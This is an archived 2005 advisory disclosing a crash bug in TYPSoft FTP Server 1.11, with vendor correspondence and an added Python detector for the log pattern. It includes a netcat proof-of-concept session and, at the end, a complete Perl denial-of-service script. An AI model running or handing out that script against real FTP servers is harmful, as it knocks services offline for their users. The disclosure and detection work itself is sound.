
typsoft-1.11.txt

Posted Oct 21, 2005
Authored by Morning Wood | Site exploitlabs.com

TYPSoft FTP Server v1.11 and earlier does not properly support the RETR command, allowing authenticated users to crash the daemon. PoC code included.

tags | advisory
SHA-256 | 36612b83e504f58ccaf2a816acc4c7c0d8164955ae0ab23d1114e380567f28b5

EXPL-A-2005-016 exploitlabs.com Advisory 045





AFFECTED PRODUCTS

TYPSoft FTP Server v1.11 and earlier
http://www.typsoft.com/



OVERVIEW

TYPSoft FTP Server is a fast and easy FTP server
with support for standard FTP commands,
a clean interface, Virtual File System architecture,
the ability to resume downloads and uploads, IP restriction,
login/quit messages, logs, multi-language support
and many other things.



DETAILS

1. DoS
TYPSoft FTP Server does not properly support the
RETR command when "Sub Directory Include" is checked
in the user config. This is exploitable by users
authenticated to TYPSoft ftpd.



POC
1. by requesting 2 RETR [string] commands in succession

C:\>nc -v 192.168.0.2 21
ftpserv [192.168.0.2] 21 (ftp) open
220 TYPSoft FTP Server 1.11 ready...
USER ok
331 Password required for ok.
PASS ok
230 User ok logged in.
RETR 0
150 Opening data connection for 0.
RETR 0
150 Opening data connection for 0.
[ crash here ]
C:\>

Exception ESocketException in module ftpserv.exe at 000862A6
"no port specified"

note: string length has no effect and
does not appear exploitable.
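
For defenders still running an affected build, the transcript above gives a simple signature: RETR sent with no PORT or PASV before it, twice in a row. The following is an added detection example, not part of the original advisory; the log line format, session ids and sample lines are constructed, and the heuristic assumes legitimate clients negotiate a data channel before every transfer.

```python
import re
from collections import defaultdict

# Constructed sample of FTP control-channel log lines (hypothetical format):
# "<timestamp> <session-id> <client-ip> <command line>"
SAMPLE_LOG = """\
2005-10-10T12:00:01 s1 192.0.2.10 USER ok
2005-10-10T12:00:02 s1 192.0.2.10 PASS ****
2005-10-10T12:00:03 s1 192.0.2.10 RETR 0
2005-10-10T12:00:03 s1 192.0.2.10 RETR 0
2005-10-10T12:00:05 s2 192.0.2.20 USER alice
2005-10-10T12:00:06 s2 192.0.2.20 PASS ****
2005-10-10T12:00:07 s2 192.0.2.20 PASV
2005-10-10T12:00:08 s2 192.0.2.20 RETR report.txt
2005-10-10T12:00:09 s2 192.0.2.20 PORT 192,0,2,20,19,137
2005-10-10T12:00:10 s2 192.0.2.20 RETR notes.txt
2005-10-10T12:00:11 s2 192.0.2.20 RETR extra.txt
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+([A-Za-z]{3,4})\b(.*)$")
NEGOTIATE = {"PORT", "PASV", "EPRT", "EPSV"}   # commands that set up a data channel
TRANSFER = {"RETR"}                            # the command named in the advisory


def find_unnegotiated_retr(log_text):
    """Return {session_id: [(timestamp, client_ip, command_line), ...]} for every
    RETR sent while the session had no pending PORT/PASV/EPRT/EPSV."""
    pending = defaultdict(bool)      # session -> data channel negotiated and unused
    findings = defaultdict(list)
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue                 # skip lines that do not fit the assumed format
        ts, sid, ip, verb, rest = m.groups()
        verb = verb.upper()          # FTP verbs are case-insensitive
        if verb in NEGOTIATE:
            pending[sid] = True
        elif verb in TRANSFER:
            if not pending[sid]:
                findings[sid].append((ts, ip, (verb + rest).strip()))
            pending[sid] = False     # each transfer consumes the negotiated channel
    return dict(findings)


def sessions_matching_advisory(log_text, threshold=2):
    """Session ids with at least `threshold` un-negotiated RETRs (the PoC sends two)."""
    return sorted(s for s, hits in find_unnegotiated_retr(log_text).items()
                  if len(hits) >= threshold)
```

With the default threshold only session s1 is reported; s2's single stray RETR is recorded by find_unnegotiated_retr but stays below the alerting threshold.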




SOLUTION:
vendor contact:
Oct 10, 2005 webmaster@typsoft.com

response:
---------
Well, I don't see any security problem except that TFS will raise an error
because the socket was not open on the second RETR.

It's more a bug than a security problem, except if you show me the opposite.

Marc
TYPSoft


reply:
------
see attached Perl PoC
http://www.exploitlabs.com/files/advisories/typsoft-poc.zip

It demonstrates a full crash (program exit) from remote.
note: a remote DoS [crash] is classified as a security issue, even if it does
not lead to compromise, due to the fact that a remote user (not
administrative) can disable [crash] a (needed) service.


response:
---------
[none]




CREDITS

This vulnerability was discovered and researched by
Donnie Werner of exploitlabs


mail: wood at exploitlabs.com
mail: morning_wood at zone-h.org
--
web: http://exploitlabs.com
web: http://zone-h.org

http://www.exploitlabs.com/files/advisories/EXPL-A-2005-016-typsoft-ftpd.txt

---

#!/usr/bin/perl

use IO::Socket;
use Socket;

print "\n-= TYPSoft FTP Server <= v1.11 DOS =-\n";
print "-= wood (at) Exploitlabs.com =-\n\n";

# Require <host> <user> <pass>, with an optional [port] (default 21).
if($#ARGV < 2 || $#ARGV > 3) { die "usage: perl typsoft-1.11-DOS.pl <host> <user> <pass> [port]\n" };
if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" };

$adr = $ARGV[0];
$usr = $ARGV[1];
$pas = $ARGV[2];
$err1 = "RETR 0";
$err2 = "RETR 1";


$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";

$remote->autoflush(1);

print $remote "USER $usr\n" and print "1. Sending : USER $usr...\n" or die
"Error: cant send user\n";

print $remote "PASS $pas\n" and print "2. Sending : PASS $pas...\n" or die
"Error: cant send pass\n";

print $remote "$err1/\n" and print "3. Sending : ErrorCode 1...\n";
print $remote "$err2/\n" and print "4. Sending : ErrorCode 2...\n\n"or die
"Error: cant send error code\n";

print "Attack done. press any key to exit\n";
$bla= <STDIN>;
close $remote;
